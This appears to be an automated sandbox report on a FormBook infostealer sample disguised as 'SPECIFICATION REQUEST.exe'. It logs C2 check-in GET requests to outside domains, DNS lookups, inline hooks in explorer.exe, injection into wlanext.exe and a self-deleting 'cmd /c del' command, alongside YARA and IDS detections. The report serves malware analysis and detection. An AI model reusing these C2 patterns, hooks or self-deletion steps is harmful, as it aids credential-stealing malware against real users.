                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xe682c0x4f.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xe80000x6ec.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xea0000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000xe48840xe4a00False0.768510371104data7.65416675715IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                  .rsrc0xe80000x6ec0x800False0.34716796875data3.72281670039IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0xea0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountry
                                                  RT_VERSION0xe80900x45cdata
                                                  RT_MANIFEST0xe84fc0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Version Infos

                                                  DescriptionData
                                                  Translation0x0000 0x04b0
                                                  LegalCopyright2021 (C) AuditFlags International
                                                  Assembly Version11.84.0.0
                                                  InternalNameUnmanagedFunctionPointerAttribute.exe
                                                  FileVersion11.84.0.0
                                                  CompanyNameAuditFlags International
                                                  LegalTrademarksAuditFlags
                                                  CommentsNon Versionable Attribute
                                                  ProductNameNon Versionable Attribute
                                                  ProductVersion11.84.0.0
                                                  FileDescriptionNon Versionable Attribute
                                                  OriginalFilenameUnmanagedFunctionPointerAttribute.exe

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  01/27/21-07:59:50.114978TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973580192.168.2.534.102.136.180
                                                  01/27/21-07:59:50.114978TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973580192.168.2.534.102.136.180
                                                  01/27/21-07:59:50.114978TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973580192.168.2.534.102.136.180
                                                  01/27/21-07:59:50.255307TCP1201ATTACK-RESPONSES 403 Forbidden804973534.102.136.180192.168.2.5

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 27, 2021 07:59:29.024792910 CET4973380192.168.2.564.92.125.40
                                                  Jan 27, 2021 07:59:29.190774918 CET804973364.92.125.40192.168.2.5
                                                  Jan 27, 2021 07:59:29.192920923 CET4973380192.168.2.564.92.125.40
                                                  Jan 27, 2021 07:59:29.193078995 CET4973380192.168.2.564.92.125.40
                                                  Jan 27, 2021 07:59:29.359106064 CET804973364.92.125.40192.168.2.5
                                                  Jan 27, 2021 07:59:29.702910900 CET4973380192.168.2.564.92.125.40
                                                  Jan 27, 2021 07:59:29.908411026 CET804973364.92.125.40192.168.2.5
                                                  Jan 27, 2021 07:59:31.009610891 CET804973364.92.125.40192.168.2.5
                                                  Jan 27, 2021 07:59:31.009732008 CET4973380192.168.2.564.92.125.40
                                                  Jan 27, 2021 07:59:31.032672882 CET804973364.92.125.40192.168.2.5
                                                  Jan 27, 2021 07:59:31.032784939 CET4973380192.168.2.564.92.125.40
                                                  Jan 27, 2021 07:59:31.033082962 CET804973364.92.125.40192.168.2.5
                                                  Jan 27, 2021 07:59:31.033155918 CET4973380192.168.2.564.92.125.40
                                                  Jan 27, 2021 07:59:50.072025061 CET4973580192.168.2.534.102.136.180
                                                  Jan 27, 2021 07:59:50.114202023 CET804973534.102.136.180192.168.2.5
                                                  Jan 27, 2021 07:59:50.114342928 CET4973580192.168.2.534.102.136.180
                                                  Jan 27, 2021 07:59:50.114978075 CET4973580192.168.2.534.102.136.180
                                                  Jan 27, 2021 07:59:50.155109882 CET804973534.102.136.180192.168.2.5
                                                  Jan 27, 2021 07:59:50.255306959 CET804973534.102.136.180192.168.2.5
                                                  Jan 27, 2021 07:59:50.255347013 CET804973534.102.136.180192.168.2.5
                                                  Jan 27, 2021 07:59:50.255507946 CET4973580192.168.2.534.102.136.180
                                                  Jan 27, 2021 07:59:50.255717993 CET4973580192.168.2.534.102.136.180
                                                  Jan 27, 2021 07:59:50.295730114 CET804973534.102.136.180192.168.2.5
                                                  Jan 27, 2021 08:00:10.509851933 CET4973680192.168.2.5194.245.148.189
                                                  Jan 27, 2021 08:00:10.556806087 CET8049736194.245.148.189192.168.2.5
                                                  Jan 27, 2021 08:00:10.557826996 CET4973680192.168.2.5194.245.148.189
                                                  Jan 27, 2021 08:00:10.558022976 CET4973680192.168.2.5194.245.148.189
                                                  Jan 27, 2021 08:00:10.604692936 CET8049736194.245.148.189192.168.2.5
                                                  Jan 27, 2021 08:00:10.607960939 CET8049736194.245.148.189192.168.2.5
                                                  Jan 27, 2021 08:00:10.607995033 CET8049736194.245.148.189192.168.2.5
                                                  Jan 27, 2021 08:00:10.608016968 CET8049736194.245.148.189192.168.2.5
                                                  Jan 27, 2021 08:00:10.608032942 CET8049736194.245.148.189192.168.2.5
                                                  Jan 27, 2021 08:00:10.608149052 CET4973680192.168.2.5194.245.148.189
                                                  Jan 27, 2021 08:00:10.608197927 CET4973680192.168.2.5194.245.148.189
                                                  Jan 27, 2021 08:00:10.608289957 CET4973680192.168.2.5194.245.148.189

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 27, 2021 07:57:58.440839052 CET6318353192.168.2.58.8.8.8
                                                  Jan 27, 2021 07:57:58.490222931 CET53631838.8.8.8192.168.2.5
                                                  Jan 27, 2021 07:57:59.328607082 CET6015153192.168.2.58.8.8.8
                                                  Jan 27, 2021 07:57:59.376739979 CET53601518.8.8.8192.168.2.5
                                                  Jan 27, 2021 07:58:00.277470112 CET5696953192.168.2.58.8.8.8
                                                  Jan 27, 2021 07:58:00.335690022 CET53569698.8.8.8192.168.2.5
                                                  Jan 27, 2021 07:58:01.497149944 CET5516153192.168.2.58.8.8.8
                                                  Jan 27, 2021 07:58:01.548069000 CET53551618.8.8.8192.168.2.5
                                                  Jan 27, 2021 07:58:21.081209898 CET5475753192.168.2.58.8.8.8
                                                  Jan 27, 2021 07:58:21.139816999 CET53547578.8.8.8192.168.2.5
                                                  Jan 27, 2021 07:58:27.701939106 CET4999253192.168.2.58.8.8.8
                                                  Jan 27, 2021 07:58:27.752819061 CET53499928.8.8.8192.168.2.5
                                                  Jan 27, 2021 07:58:47.718944073 CET6007553192.168.2.58.8.8.8
                                                  Jan 27, 2021 07:58:47.771584034 CET53600758.8.8.8192.168.2.5
                                                  Jan 27, 2021 07:58:49.283528090 CET5501653192.168.2.58.8.8.8
                                                  Jan 27, 2021 07:58:49.349827051 CET53550168.8.8.8192.168.2.5
                                                  Jan 27, 2021 07:58:51.628947020 CET6434553192.168.2.58.8.8.8
                                                  Jan 27, 2021 07:58:51.650652885 CET5712853192.168.2.58.8.8.8
                                                  Jan 27, 2021 07:58:51.687107086 CET53643458.8.8.8192.168.2.5
                                                  Jan 27, 2021 07:58:51.708939075 CET53571288.8.8.8192.168.2.5
                                                  Jan 27, 2021 07:59:05.902718067 CET5479153192.168.2.58.8.8.8
                                                  Jan 27, 2021 07:59:05.978482008 CET53547918.8.8.8192.168.2.5
                                                  Jan 27, 2021 07:59:28.342371941 CET5046353192.168.2.58.8.8.8
                                                  Jan 27, 2021 07:59:28.393296957 CET53504638.8.8.8192.168.2.5
                                                  Jan 27, 2021 07:59:28.835100889 CET5039453192.168.2.58.8.8.8
                                                  Jan 27, 2021 07:59:29.020076990 CET53503948.8.8.8192.168.2.5
                                                  Jan 27, 2021 07:59:30.042473078 CET5853053192.168.2.58.8.8.8
                                                  Jan 27, 2021 07:59:30.093532085 CET53585308.8.8.8192.168.2.5
                                                  Jan 27, 2021 07:59:50.007734060 CET5381353192.168.2.58.8.8.8
                                                  Jan 27, 2021 07:59:50.070718050 CET53538138.8.8.8192.168.2.5
                                                  Jan 27, 2021 08:00:10.439079046 CET6373253192.168.2.58.8.8.8
                                                  Jan 27, 2021 08:00:10.508335114 CET53637328.8.8.8192.168.2.5
                                                  Jan 27, 2021 08:00:30.783189058 CET5734453192.168.2.58.8.8.8
                                                  Jan 27, 2021 08:00:30.906291008 CET53573448.8.8.8192.168.2.5
                                                  Jan 27, 2021 08:00:39.376478910 CET5445053192.168.2.58.8.8.8
                                                  Jan 27, 2021 08:00:39.435245037 CET53544508.8.8.8192.168.2.5
                                                  Jan 27, 2021 08:00:40.170747995 CET5926153192.168.2.58.8.8.8
                                                  Jan 27, 2021 08:00:40.222067118 CET53592618.8.8.8192.168.2.5
                                                  Jan 27, 2021 08:00:40.903573990 CET5715153192.168.2.58.8.8.8
                                                  Jan 27, 2021 08:00:40.960308075 CET53571518.8.8.8192.168.2.5
                                                  Jan 27, 2021 08:00:41.603605032 CET5941353192.168.2.58.8.8.8
                                                  Jan 27, 2021 08:00:41.661587000 CET53594138.8.8.8192.168.2.5
                                                  Jan 27, 2021 08:00:42.446280956 CET6051653192.168.2.58.8.8.8
                                                  Jan 27, 2021 08:00:42.503348112 CET53605168.8.8.8192.168.2.5
                                                  Jan 27, 2021 08:00:43.197535038 CET5164953192.168.2.58.8.8.8
                                                  Jan 27, 2021 08:00:43.254858017 CET53516498.8.8.8192.168.2.5
                                                  Jan 27, 2021 08:00:44.065562963 CET6508653192.168.2.58.8.8.8
                                                  Jan 27, 2021 08:00:44.124996901 CET53650868.8.8.8192.168.2.5
                                                  Jan 27, 2021 08:00:45.182440042 CET5643253192.168.2.58.8.8.8
                                                  Jan 27, 2021 08:00:45.239021063 CET53564328.8.8.8192.168.2.5
                                                  Jan 27, 2021 08:00:46.471395016 CET5292953192.168.2.58.8.8.8
                                                  Jan 27, 2021 08:00:46.531291008 CET53529298.8.8.8192.168.2.5
                                                  Jan 27, 2021 08:00:48.017504930 CET6431753192.168.2.58.8.8.8
                                                  Jan 27, 2021 08:00:48.065536976 CET53643178.8.8.8192.168.2.5
                                                  Jan 27, 2021 08:00:53.543128967 CET6100453192.168.2.58.8.8.8
                                                  Jan 27, 2021 08:00:53.785362959 CET53610048.8.8.8192.168.2.5

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Jan 27, 2021 07:59:05.902718067 CET192.168.2.58.8.8.80xe40eStandard query (0)www.planterboxgardener.comA (IP address)IN (0x0001)
                                                  Jan 27, 2021 07:59:28.835100889 CET192.168.2.58.8.8.80x307fStandard query (0)www.toprestau.comA (IP address)IN (0x0001)
                                                  Jan 27, 2021 07:59:50.007734060 CET192.168.2.58.8.8.80xb134Standard query (0)www.bistrolartichaut.comA (IP address)IN (0x0001)
                                                  Jan 27, 2021 08:00:10.439079046 CET192.168.2.58.8.8.80x6ea8Standard query (0)www.firstbyphone.comA (IP address)IN (0x0001)
                                                  Jan 27, 2021 08:00:30.783189058 CET192.168.2.58.8.8.80x3010Standard query (0)www.xn--fllessang-g3a.comA (IP address)IN (0x0001)
                                                  Jan 27, 2021 08:00:53.543128967 CET192.168.2.58.8.8.80x8ecStandard query (0)www.douyzqdsgl.comA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  Jan 27, 2021 07:59:05.978482008 CET8.8.8.8192.168.2.50xe40eName error (3)www.planterboxgardener.comnonenoneA (IP address)IN (0x0001)
                                                  Jan 27, 2021 07:59:29.020076990 CET8.8.8.8192.168.2.50x307fNo error (0)www.toprestau.comtoprestau.comCNAME (Canonical name)IN (0x0001)
                                                  Jan 27, 2021 07:59:29.020076990 CET8.8.8.8192.168.2.50x307fNo error (0)toprestau.com64.92.125.40A (IP address)IN (0x0001)
                                                  Jan 27, 2021 07:59:50.070718050 CET8.8.8.8192.168.2.50xb134No error (0)www.bistrolartichaut.combistrolartichaut.comCNAME (Canonical name)IN (0x0001)
                                                  Jan 27, 2021 07:59:50.070718050 CET8.8.8.8192.168.2.50xb134No error (0)bistrolartichaut.com34.102.136.180A (IP address)IN (0x0001)
                                                  Jan 27, 2021 08:00:10.508335114 CET8.8.8.8192.168.2.50x6ea8No error (0)www.firstbyphone.com194.245.148.189A (IP address)IN (0x0001)
                                                  Jan 27, 2021 08:00:30.906291008 CET8.8.8.8192.168.2.50x3010Server failure (2)www.xn--fllessang-g3a.comnonenoneA (IP address)IN (0x0001)
                                                  Jan 27, 2021 08:00:53.785362959 CET8.8.8.8192.168.2.50x8ecServer failure (2)www.douyzqdsgl.comnonenoneA (IP address)IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • www.toprestau.com
                                                  • www.bistrolartichaut.com
                                                  • www.firstbyphone.com

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.54973364.92.125.4080C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Jan 27, 2021 07:59:29.193078995 CET4739OUTGET /gbr/?ExlPdj=nhAt8Z8LHJDSJ38oPYfO+brGMc7hoePPt0UT7/rkXoSmXfJRpMQb8gX/3j1aoGmg1yg5&8p=FjoPdvK0HvW0 HTTP/1.1
                                                  Host: www.toprestau.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 27, 2021 07:59:31.009610891 CET4749INHTTP/1.1 301 Moved Permanently
                                                  Date: Wed, 27 Jan 2021 06:59:29 GMT
                                                  Server: Apache
                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                  X-Redirect-By: WordPress
                                                  Location: http://toprestau.com/gbr/?ExlPdj=nhAt8Z8LHJDSJ38oPYfO+brGMc7hoePPt0UT7/rkXoSmXfJRpMQb8gX/3j1aoGmg1yg5&8p=FjoPdvK0HvW0
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  Content-Type: text/html; charset=UTF-8
                                                  Data Raw: 32 0d 0a 0d 0a 0d 0a
                                                  Data Ascii: 2


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.2.54973534.102.136.18080C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Jan 27, 2021 07:59:50.114978075 CET4752OUTGET /gbr/?8p=FjoPdvK0HvW0&ExlPdj=Iv22WWjBKqQBYt0GN1Q3exOP7ZZ1MpJKXobvjkOcU9p13P0mNXwz/8InMIRVOTv7wUKT HTTP/1.1
                                                  Host: www.bistrolartichaut.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 27, 2021 07:59:50.255306959 CET4752INHTTP/1.1 403 Forbidden
                                                  Server: openresty
                                                  Date: Wed, 27 Jan 2021 06:59:50 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 275
                                                  ETag: "600b4d20-113"
                                                  Via: 1.1 google
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  2192.168.2.549736194.245.148.18980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Jan 27, 2021 08:00:10.558022976 CET4754OUTGET /gbr/?ExlPdj=9T+hwsCOJ30KUotVp56F2oUIcU+kzNAqslJ8t+71ysezeCdq1RydECu9CMdgx5D0Nzh8&8p=FjoPdvK0HvW0 HTTP/1.1
                                                  Host: www.firstbyphone.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 27, 2021 08:00:10.607960939 CET4754INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Server: Joker.com HTTP Parking Server
                                                  Date: Wed, 27 Jan 2021 07:00:10 GMT
                                                  Last-Modified: Wed, 27 Jan 2021 07:00:10 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate, post-check= 0, pre-check=0, max-age=3600
                                                  Expires: Fri, 01 Jan 2016 00:00:00 GMT
                                                  Content-Length: 1840
                                                  Connection: Close


                                                  Code Manipulations

                                                  User Modules

                                                  Hook Summary

                                                  Function NameHook TypeActive in Processes
                                                  PeekMessageAINLINEexplorer.exe
                                                  PeekMessageWINLINEexplorer.exe
                                                  GetMessageWINLINEexplorer.exe
                                                  GetMessageAINLINEexplorer.exe

                                                  Processes

                                                  Process: explorer.exe, Module: user32.dll
                                                  Function NameHook TypeNew Data
                                                  PeekMessageAINLINE0x48 0x8B 0xB8 0x83 0x3E 0xEE
                                                  PeekMessageWINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xEE
                                                  GetMessageWINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xEE
                                                  GetMessageAINLINE0x48 0x8B 0xB8 0x83 0x3E 0xEE

                                                  Statistics

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Start time:07:58:02
                                                  Start date:27/01/2021
                                                  Path:C:\Users\user\Desktop\SPECIFICATION REQUEST.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Users\user\Desktop\SPECIFICATION REQUEST.exe'
                                                  Imagebase:0x330000
                                                  File size:939520 bytes
                                                  MD5 hash:E7D7F8B02DD023F31B46E5BB265C7224
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.234689042.0000000002A35000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.234997361.00000000039B1000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.234997361.00000000039B1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.234997361.00000000039B1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  General

                                                  Start time:07:58:04
                                                  Start date:27/01/2021
                                                  Path:C:\Users\user\Desktop\SPECIFICATION REQUEST.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\SPECIFICATION REQUEST.exe
                                                  Imagebase:0x680000
                                                  File size:939520 bytes
                                                  MD5 hash:E7D7F8B02DD023F31B46E5BB265C7224
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.275652340.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.275652340.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.275652340.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.276091208.0000000001030000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.276091208.0000000001030000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.276091208.0000000001030000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.276039902.0000000000FF0000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.276039902.0000000000FF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.276039902.0000000000FF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  General

                                                  Start time:07:58:09
                                                  Start date:27/01/2021
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:
                                                  Imagebase:0x7ff693d90000
                                                  File size:3933184 bytes
                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:07:58:21
                                                  Start date:27/01/2021
                                                  Path:C:\Windows\SysWOW64\wlanext.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                  Imagebase:0x1280000
                                                  File size:78848 bytes
                                                  MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.603741374.00000000005B0000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.603741374.00000000005B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.603741374.00000000005B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.605460849.0000000000D70000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.605460849.0000000000D70000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.605460849.0000000000D70000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.604735296.0000000000C20000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.604735296.0000000000C20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.604735296.0000000000C20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:moderate

                                                  General

                                                  Start time:07:58:25
                                                  Start date:27/01/2021
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:/c del 'C:\Users\user\Desktop\SPECIFICATION REQUEST.exe'
                                                  Imagebase:0xa10000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:07:58:25
                                                  Start date:27/01/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff797770000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Disassembly

                                                  Code Analysis

                                                  Reset < >